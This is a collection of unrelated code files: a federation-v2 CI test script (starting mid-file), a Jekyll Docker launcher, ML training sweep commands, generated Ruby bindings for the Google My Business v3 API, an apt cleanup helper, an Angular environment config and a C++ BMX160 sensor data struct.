  ${cmd} --ginkgo.skip=Placement
  ${cmd} --ginkgo.focus=Placement
}
# Re-run code generation and fail if it changes the working tree, i.e. the
# checked-in generated sources were stale.
function check-kubebuilder-output() {
  ./bin/kubebuilder generate
  echo "Checking state of working tree after running 'kubebuilder generate'"
  check-git-state
}
# Regenerate hack/install-latest.yaml and fail if the working tree changes,
# i.e. the checked-in install yaml was out of date.
function check-install-yaml() {
  # The env-var prefix scopes PATH/namespace/output file to this one command.
  PATH="${PATH}:${base_dir}/bin" FEDERATION_NAMESPACE=federation-system \
    INSTALL_YAML=./hack/install-latest.yaml \
    ./scripts/generate-install-yaml.sh \
    ${CONTAINER_REGISTRY_HOST}/federation-v2:latest
  echo "Checking state of working tree after generating install yaml"
  check-git-state
}
# Return non-zero (failing the script under errexit) when the git working
# tree is dirty, printing the offending paths and a diff.
function check-git-state() {
  local output
  if output=$(git status --porcelain) && [[ -z "${output}" ]]; then
    return
  fi
  echo "ERROR: the working tree is dirty:"
  # The previous `for line in "${output}"` iterated exactly once over the
  # whole quoted string; printf prints the status lines directly.
  printf '%s\n' "${output}"
  git diff
  return 1
}
# Make sure, we run in the root of the repo and
# therefore run the tests on all packages
base_dir="$( cd "$(dirname "$0")/.." && pwd )"
cd "$base_dir" || {
  echo "Cannot cd to '$base_dir'. Aborting." >&2
  exit 1
}
# --- Static checks: formatting, lint, generated artifacts up to date. ---
echo "Downloading test dependencies"
download-dependencies
echo "Checking initial state of working tree"
check-git-state
echo "Verifying Gofmt"
./hack/go-tools/verify-gofmt.sh
echo "Checking that correct Error Package is used."
./hack/verify-errpkg.sh
echo "Checking that 'kubebuilder generate' is up-to-date"
check-kubebuilder-output
echo "Checking that hack/install-latest.yaml is up-to-date"
check-install-yaml
echo "Checking that fixture is available for all federate directives"
./scripts/check-directive-fixtures.sh
# --- Build, unit tests, and managed-fixture e2e. ---
echo "Building federation binaries"
build-binaries
echo "Running unit tests"
run-unit-tests
echo "Running go e2e tests with managed fixture"
run-e2e-tests-with-managed-fixture
# --- Bring up real clusters for the unmanaged-fixture e2e runs. ---
echo "Downloading e2e test dependencies"
./scripts/download-e2e-binaries.sh
export PATH=${TEST_ASSET_PATH}:${PATH}
CREATE_INSECURE_REGISTRY=y CONFIGURE_INSECURE_REGISTRY=y OVERWRITE_KUBECONFIG=y \
./scripts/create-clusters.sh
# Initialize list of clusters to join
join-cluster-list > /dev/null
# --- Cluster-scoped deployment: script-based, then helm-chart-based. ---
echo "Deploying federation-v2"
./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Checking sync up status of helm chart"
BUILD_KUBEFED="false" PATH="${PATH}:${base_dir}/bin" ./scripts/sync-up-helm-chart.sh
echo "Checking helm chart state of working tree"
check-git-state
echo "Running go e2e tests with unmanaged fixture deployed by script"
run-e2e-tests-with-unmanaged-fixture
echo "Deleting federation-v2"
./scripts/delete-federation.sh
echo "Deploying federation-v2 with helm chart"
USE_CHART=y ./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Running go e2e tests with unmanaged fixture deployed by helm chart"
run-e2e-tests-with-unmanaged-fixture
echo "Deleting federation-v2 with helm chart"
USE_CHART=y ./scripts/delete-federation.sh
# --- Namespace-scoped deployment: script-based, then helm-chart-based. ---
echo "Deploying namespaced federation-v2"
FEDERATION_NAMESPACE=foo NAMESPACED=y ./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Running go e2e tests with unmanaged fixture deployed by script"
run-namespaced-e2e-tests-with-unmanaged-fixture
echo "Deleting namespaced federation-v2"
FEDERATION_NAMESPACE=foo NAMESPACED=y DELETE_CLUSTER_RESOURCE=y ./scripts/delete-federation.sh
echo "Deploying federation-v2 with helm chart"
FEDERATION_NAMESPACE=foo NAMESPACED=y USE_CHART=y ./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Running go e2e tests with unmanaged fixture deployed by helm chart"
run-namespaced-e2e-tests-with-unmanaged-fixture
|
#!/bin/bash
# Serve the Jekyll blog from the current directory in a disposable Docker
# container on port 4000, and wait until the server answers.
docker run -d --rm --name blog -p 4000:4000 -w /srv/jekyll -v $(pwd):/srv/jekyll jekyll/jekyll:3.5.2 /bin/bash -c "bundle install && jekyll server -H 0.0.0.0 --watch"
# Fixed: the message previously claimed port 4080 while the script polls 4000.
echo "Waiting blog to launch on 4000..."
# waitport <port>: poll http://localhost:<port> once a second until it
# answers a HEAD request.
waitport() {
  set -e
  while ! curl --output /dev/null --silent --head --fail "http://localhost:$1"; do sleep 1 && echo -n .; done;
  set +e
}
waitport 4000
echo "blog launched"
echo "Have fun on http://localhost:4000"
|
# Training sweep: one invocation per model/task combination, each repeated
# with and without adversarial training.
# Monte Carlo dropout feed-forward network
python main.py --model=NN_MC --mode=train --task=regression
python main.py --model=NN_MC --mode=train --task=classification --n_epochs=1000
python main.py --model=NN_MC --mode=train --task=regression --adversarial_training
python main.py --model=NN_MC --mode=train --task=classification --n_epochs=1000 --adversarial_training
# Deep ensembles
python main.py --model=Deep_Ensemble --mode=train --task=regression
python main.py --model=Deep_Ensemble --mode=train --task=classification --n_epochs=1000
python main.py --model=Deep_Ensemble --mode=train --task=regression --adversarial_training
python main.py --model=Deep_Ensemble --mode=train --task=classification --n_epochs=1000 --adversarial_training
# SWAG (stochastic weight averaging - Gaussian)
python main.py --model=SWAG --task=regression --mode=train --n_epochs=2000
python main.py --model=SWAG --task=regression --mode=train --n_epochs=3000 --adversarial_training
python main.py --model=SWAG --task=classification --mode=train --n_epochs=2000
python main.py --model=SWAG --task=classification --mode=train --n_epochs=2000 --adversarial_training
# Monte Carlo dropout LSTM
python main.py --model=LSTM_MC --task=regression --mode=train --n_epochs=1000
python main.py --model=LSTM_MC --task=regression --mode=train --n_epochs=2000 --adversarial_training
python main.py --model=LSTM_MC --task=classification --mode=train --n_epochs=1000
python main.py --model=LSTM_MC --task=classification --mode=train --n_epochs=1000 --adversarial_training
# Bayesian neural network
python main.py --model=BNN --task=regression --mode=train --n_epochs=2500
python main.py --model=BNN --task=regression --mode=train --n_epochs=3000 --adversarial_training
python main.py --model=BNN --task=classification --mode=train --n_epochs=500
python main.py --model=BNN --task=classification --mode=train --n_epochs=500 --adversarial_training
# Monte Carlo dropout GNN
python main.py --model=GNN_MC --task=regression --mode=train --n_epochs=1000
python main.py --model=GNN_MC --task=regression --mode=train --n_epochs=1000 --adversarial_training
python main.py --model=GNN_MC --task=classification --mode=train --n_epochs=500
python main.py --model=GNN_MC --task=classification --mode=train --n_epochs=500 --adversarial_training
|
<filename>generated/google/apis/mybusiness_v3/representations.rb
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
# Generated JSON representations for the Google My Business v3 API.
# NOTE(review): this file appears to be machine-generated (google-api-client
# style); prefer regenerating over hand-editing.
module Google
  module Apis
    module MybusinessV3
      # Forward declarations: each schema class is declared first with an
      # empty Representation so the decorators below can reference each
      # other regardless of definition order.
      class Account
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class AccountState
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class AdWordsLocationExtensions
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Address
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Admin
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class AssociateLocationRequest
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Attribute
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class AttributeMetadata
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class AttributeValueMetadata
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class BatchGetLocationsRequest
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class BatchGetLocationsResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class BusinessHours
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Category
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ClearLocationAssociationRequest
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      # NOTE(review): intentionally shadows Ruby's stdlib Date inside this
      # module scope; generated callers always qualify the constant.
      class Date
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Duplicate
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Empty
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class FindMatchingLocationsRequest
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class FindMatchingLocationsResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class GoogleUpdatedLocation
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class LatLng
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ListAccountAdminsResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ListAccountsResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ListLocationAdminsResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ListLocationAttributeMetadataResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ListLocationsResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ListReviewsResponse
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Location
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class LocationKey
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class LocationState
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class MatchedLocation
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Metadata
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class OpenInfo
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Photos
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class PlaceInfo
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Places
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class PointRadius
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Review
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ReviewReply
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class Reviewer
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class ServiceAreaBusiness
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class SpecialHourPeriod
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class SpecialHours
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class TimePeriod
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      class TransferLocationRequest
        class Representation < Google::Apis::Core::JsonRepresentation; end

        include Google::Apis::Core::JsonObjectSupport
      end

      # Wire-format bindings: each Representation maps snake_case Ruby
      # attributes to the camelCase JSON field names.
      class Account
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :account_name, as: 'accountName'
          property :name, as: 'name'
          property :role, as: 'role'
          property :state, as: 'state', class: Google::Apis::MybusinessV3::AccountState, decorator: Google::Apis::MybusinessV3::AccountState::Representation

          property :type, as: 'type'
        end
      end

      class AccountState
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :status, as: 'status'
        end
      end

      class AdWordsLocationExtensions
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :ad_phone, as: 'adPhone'
        end
      end

      class Address
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :address_lines, as: 'addressLines'
          property :administrative_area, as: 'administrativeArea'
          property :country, as: 'country'
          property :locality, as: 'locality'
          property :postal_code, as: 'postalCode'
          property :sub_locality, as: 'subLocality'
        end
      end

      class Admin
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :admin_name, as: 'adminName'
          property :name, as: 'name'
          property :pending_invitation, as: 'pendingInvitation'
          property :role, as: 'role'
        end
      end

      class AssociateLocationRequest
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :place_id, as: 'placeId'
        end
      end

      class Attribute
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :attribute_id, as: 'attributeId'
          property :value_type, as: 'valueType'
          collection :values, as: 'values'
        end
      end

      class AttributeMetadata
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :attribute_id, as: 'attributeId'
          property :display_name, as: 'displayName'
          property :group_display_name, as: 'groupDisplayName'
          property :is_repeatable, as: 'isRepeatable'
          collection :value_metadata, as: 'valueMetadata', class: Google::Apis::MybusinessV3::AttributeValueMetadata, decorator: Google::Apis::MybusinessV3::AttributeValueMetadata::Representation

          property :value_type, as: 'valueType'
        end
      end

      class AttributeValueMetadata
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :display_name, as: 'displayName'
          property :value, as: 'value'
        end
      end

      class BatchGetLocationsRequest
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :location_names, as: 'locationNames'
        end
      end

      class BatchGetLocationsResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :locations, as: 'locations', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation

        end
      end

      class BusinessHours
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :periods, as: 'periods', class: Google::Apis::MybusinessV3::TimePeriod, decorator: Google::Apis::MybusinessV3::TimePeriod::Representation

        end
      end

      class Category
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :category_id, as: 'categoryId'
          property :name, as: 'name'
        end
      end

      # Empty request body by design.
      class ClearLocationAssociationRequest
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
        end
      end

      class Date
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :day, as: 'day'
          property :month, as: 'month'
          property :year, as: 'year'
        end
      end

      class Duplicate
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :location_name, as: 'locationName'
          property :ownership, as: 'ownership'
        end
      end

      # Empty message by design.
      class Empty
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
        end
      end

      class FindMatchingLocationsRequest
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :language_code, as: 'languageCode'
          property :max_cache_duration, as: 'maxCacheDuration'
          property :num_results, as: 'numResults'
        end
      end

      class FindMatchingLocationsResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :match_time, as: 'matchTime'
          collection :matched_locations, as: 'matchedLocations', class: Google::Apis::MybusinessV3::MatchedLocation, decorator: Google::Apis::MybusinessV3::MatchedLocation::Representation

        end
      end

      class GoogleUpdatedLocation
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :diff_mask, as: 'diffMask'
          property :location, as: 'location', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation

        end
      end

      class LatLng
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :latitude, as: 'latitude'
          property :longitude, as: 'longitude'
        end
      end

      class ListAccountAdminsResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :admins, as: 'admins', class: Google::Apis::MybusinessV3::Admin, decorator: Google::Apis::MybusinessV3::Admin::Representation

        end
      end

      class ListAccountsResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :accounts, as: 'accounts', class: Google::Apis::MybusinessV3::Account, decorator: Google::Apis::MybusinessV3::Account::Representation

          property :next_page_token, as: 'nextPageToken'
        end
      end

      class ListLocationAdminsResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :admins, as: 'admins', class: Google::Apis::MybusinessV3::Admin, decorator: Google::Apis::MybusinessV3::Admin::Representation

        end
      end

      class ListLocationAttributeMetadataResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :attributes, as: 'attributes', class: Google::Apis::MybusinessV3::AttributeMetadata, decorator: Google::Apis::MybusinessV3::AttributeMetadata::Representation

        end
      end

      class ListLocationsResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :locations, as: 'locations', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation

          property :next_page_token, as: 'nextPageToken'
        end
      end

      class ListReviewsResponse
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :average_rating, as: 'averageRating'
          property :next_page_token, as: 'nextPageToken'
          collection :reviews, as: 'reviews', class: Google::Apis::MybusinessV3::Review, decorator: Google::Apis::MybusinessV3::Review::Representation

          property :total_review_count, as: 'totalReviewCount'
        end
      end

      class Location
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :ad_words_location_extensions, as: 'adWordsLocationExtensions', class: Google::Apis::MybusinessV3::AdWordsLocationExtensions, decorator: Google::Apis::MybusinessV3::AdWordsLocationExtensions::Representation

          collection :additional_categories, as: 'additionalCategories', class: Google::Apis::MybusinessV3::Category, decorator: Google::Apis::MybusinessV3::Category::Representation

          collection :additional_phones, as: 'additionalPhones'
          property :address, as: 'address', class: Google::Apis::MybusinessV3::Address, decorator: Google::Apis::MybusinessV3::Address::Representation

          collection :attributes, as: 'attributes', class: Google::Apis::MybusinessV3::Attribute, decorator: Google::Apis::MybusinessV3::Attribute::Representation

          collection :labels, as: 'labels'
          property :latlng, as: 'latlng', class: Google::Apis::MybusinessV3::LatLng, decorator: Google::Apis::MybusinessV3::LatLng::Representation

          property :location_key, as: 'locationKey', class: Google::Apis::MybusinessV3::LocationKey, decorator: Google::Apis::MybusinessV3::LocationKey::Representation

          property :location_name, as: 'locationName'
          property :location_state, as: 'locationState', class: Google::Apis::MybusinessV3::LocationState, decorator: Google::Apis::MybusinessV3::LocationState::Representation

          property :metadata, as: 'metadata', class: Google::Apis::MybusinessV3::Metadata, decorator: Google::Apis::MybusinessV3::Metadata::Representation

          property :name, as: 'name'
          property :open_info, as: 'openInfo', class: Google::Apis::MybusinessV3::OpenInfo, decorator: Google::Apis::MybusinessV3::OpenInfo::Representation

          property :photos, as: 'photos', class: Google::Apis::MybusinessV3::Photos, decorator: Google::Apis::MybusinessV3::Photos::Representation

          property :primary_category, as: 'primaryCategory', class: Google::Apis::MybusinessV3::Category, decorator: Google::Apis::MybusinessV3::Category::Representation

          property :primary_phone, as: 'primaryPhone'
          property :regular_hours, as: 'regularHours', class: Google::Apis::MybusinessV3::BusinessHours, decorator: Google::Apis::MybusinessV3::BusinessHours::Representation

          property :service_area, as: 'serviceArea', class: Google::Apis::MybusinessV3::ServiceAreaBusiness, decorator: Google::Apis::MybusinessV3::ServiceAreaBusiness::Representation

          property :special_hours, as: 'specialHours', class: Google::Apis::MybusinessV3::SpecialHours, decorator: Google::Apis::MybusinessV3::SpecialHours::Representation

          property :store_code, as: 'storeCode'
          property :website_url, as: 'websiteUrl'
        end
      end

      class LocationKey
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :explicit_no_place_id, as: 'explicitNoPlaceId'
          property :place_id, as: 'placeId'
          property :plus_page_id, as: 'plusPageId'
        end
      end

      class LocationState
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :can_delete, as: 'canDelete'
          property :can_update, as: 'canUpdate'
          property :is_duplicate, as: 'isDuplicate'
          property :is_google_updated, as: 'isGoogleUpdated'
          property :is_suspended, as: 'isSuspended'
          property :is_verified, as: 'isVerified'
          property :needs_reverification, as: 'needsReverification'
        end
      end

      class MatchedLocation
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :is_exact_match, as: 'isExactMatch'
          property :location, as: 'location', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation

        end
      end

      class Metadata
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :duplicate, as: 'duplicate', class: Google::Apis::MybusinessV3::Duplicate, decorator: Google::Apis::MybusinessV3::Duplicate::Representation

        end
      end

      class OpenInfo
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :status, as: 'status'
        end
      end

      class Photos
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :additional_photo_urls, as: 'additionalPhotoUrls'
          collection :common_areas_photo_urls, as: 'commonAreasPhotoUrls'
          property :cover_photo_url, as: 'coverPhotoUrl'
          collection :exterior_photo_urls, as: 'exteriorPhotoUrls'
          collection :food_and_drink_photo_urls, as: 'foodAndDrinkPhotoUrls'
          collection :interior_photo_urls, as: 'interiorPhotoUrls'
          property :logo_photo_url, as: 'logoPhotoUrl'
          collection :menu_photo_urls, as: 'menuPhotoUrls'
          collection :photos_at_work_urls, as: 'photosAtWorkUrls'
          property :preferred_photo, as: 'preferredPhoto'
          collection :product_photo_urls, as: 'productPhotoUrls'
          property :profile_photo_url, as: 'profilePhotoUrl'
          collection :rooms_photo_urls, as: 'roomsPhotoUrls'
          collection :team_photo_urls, as: 'teamPhotoUrls'
        end
      end

      class PlaceInfo
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :name, as: 'name'
          property :place_id, as: 'placeId'
        end
      end

      class Places
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :place_infos, as: 'placeInfos', class: Google::Apis::MybusinessV3::PlaceInfo, decorator: Google::Apis::MybusinessV3::PlaceInfo::Representation

        end
      end

      class PointRadius
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :latlng, as: 'latlng', class: Google::Apis::MybusinessV3::LatLng, decorator: Google::Apis::MybusinessV3::LatLng::Representation

          property :radius_km, as: 'radiusKm'
        end
      end

      class Review
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :comment, as: 'comment'
          property :create_time, as: 'createTime'
          property :review_id, as: 'reviewId'
          property :review_reply, as: 'reviewReply', class: Google::Apis::MybusinessV3::ReviewReply, decorator: Google::Apis::MybusinessV3::ReviewReply::Representation

          property :reviewer, as: 'reviewer', class: Google::Apis::MybusinessV3::Reviewer, decorator: Google::Apis::MybusinessV3::Reviewer::Representation

          property :star_rating, as: 'starRating'
          property :update_time, as: 'updateTime'
        end
      end

      class ReviewReply
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :comment, as: 'comment'
          property :update_time, as: 'updateTime'
        end
      end

      class Reviewer
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :display_name, as: 'displayName'
          property :is_anonymous, as: 'isAnonymous'
        end
      end

      class ServiceAreaBusiness
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :business_type, as: 'businessType'
          property :places, as: 'places', class: Google::Apis::MybusinessV3::Places, decorator: Google::Apis::MybusinessV3::Places::Representation

          property :radius, as: 'radius', class: Google::Apis::MybusinessV3::PointRadius, decorator: Google::Apis::MybusinessV3::PointRadius::Representation

        end
      end

      class SpecialHourPeriod
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :close_time, as: 'closeTime'
          property :end_date, as: 'endDate', class: Google::Apis::MybusinessV3::Date, decorator: Google::Apis::MybusinessV3::Date::Representation

          property :is_closed, as: 'isClosed'
          property :open_time, as: 'openTime'
          property :start_date, as: 'startDate', class: Google::Apis::MybusinessV3::Date, decorator: Google::Apis::MybusinessV3::Date::Representation

        end
      end

      class SpecialHours
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          collection :special_hour_periods, as: 'specialHourPeriods', class: Google::Apis::MybusinessV3::SpecialHourPeriod, decorator: Google::Apis::MybusinessV3::SpecialHourPeriod::Representation

        end
      end

      class TimePeriod
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :close_day, as: 'closeDay'
          property :close_time, as: 'closeTime'
          property :open_day, as: 'openDay'
          property :open_time, as: 'openTime'
        end
      end

      class TransferLocationRequest
        # @private
        class Representation < Google::Apis::Core::JsonRepresentation
          property :to_account, as: 'toAccount'
        end
      end
    end
  end
end
|
#!/bin/bash
# A little helper to manually clean Ubuntu/Debian machines after updates
UNAME=$(uname | tr "[:upper:]" "[:lower:]")
case "$UNAME" in
  linux)
    sudo apt autoclean && sudo apt autoremove
    ;;
  *)
    echo "You're not in Linux, you're in $UNAME"
    ;;
esac
|
<reponame>raja-ravi-prakash/website<filename>src/environments/environment.prod.ts
import { git } from './token';

// Production build configuration. The API key is read from the separate
// token module (presumably kept out of version control -- verify).
export const environment = {
  production: true,
  git: git.key,
};
|
<filename>src/shared/sensors/BMX160/BMX160WithCorrectionData.h
/* Copyright (c) 2021 Skyward Experimental Rocketry
* Authors: <NAME>, <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#pragma once
#include "sensors/BMX160/BMX160Data.h"
// BMX160 sample with calibration corrections applied. Same field layout and
// CSV format as BMX160Data, so corrected and raw samples can be logged
// interchangeably.
struct BMX160WithCorrectionData : public BMX160Data
{
    BMX160WithCorrectionData() : BMX160Data() {}

    // Builds a corrected sample from a raw one by delegating to the
    // three-argument constructor: `data` is implicitly sliced to its
    // accelerometer, gyroscope and magnetometer base sub-objects.
    BMX160WithCorrectionData(const BMX160Data& data)
        : BMX160WithCorrectionData(data, data, data)
    {
    }

    BMX160WithCorrectionData(AccelerometerData acc, GyroscopeData gyr,
                             MagnetometerData mag)
        : BMX160Data(acc, gyr, mag)
    {
    }

    // The axis-wise assignments below copy only x/y/z; the corresponding
    // timestamp fields are left untouched.
    BMX160WithCorrectionData& operator=(AccelerometerData acc)
    {
        accel_x = acc.accel_x;
        accel_y = acc.accel_y;
        accel_z = acc.accel_z;
        return *this;
    }

    BMX160WithCorrectionData& operator=(GyroscopeData gyr)
    {
        gyro_x = gyr.gyro_x;
        gyro_y = gyr.gyro_y;
        gyro_z = gyr.gyro_z;
        return *this;
    }

    BMX160WithCorrectionData& operator=(MagnetometerData mag)
    {
        mag_x = mag.mag_x;
        mag_y = mag.mag_y;
        mag_z = mag.mag_z;
        return *this;
    }

    // CSV column names matching print().
    static std::string header()
    {
        return "accel_timestamp,accel_x,accel_y,accel_z,gyro_timestamp,gyro_x,"
               "gyro_y,"
               "gyro_z,mag_timestamp,mag_x,mag_y,mag_z\n";
    }

    // Writes one CSV line in the order declared by header().
    void print(std::ostream& os) const
    {
        os << accel_timestamp << "," << accel_x << "," << accel_y << ","
           << accel_z << "," << gyro_timestamp << "," << gyro_x << "," << gyro_y
           << "," << gyro_z << "," << mag_timestamp << "," << mag_x << ","
           << mag_y << "," << mag_z << "\n";
    }
};
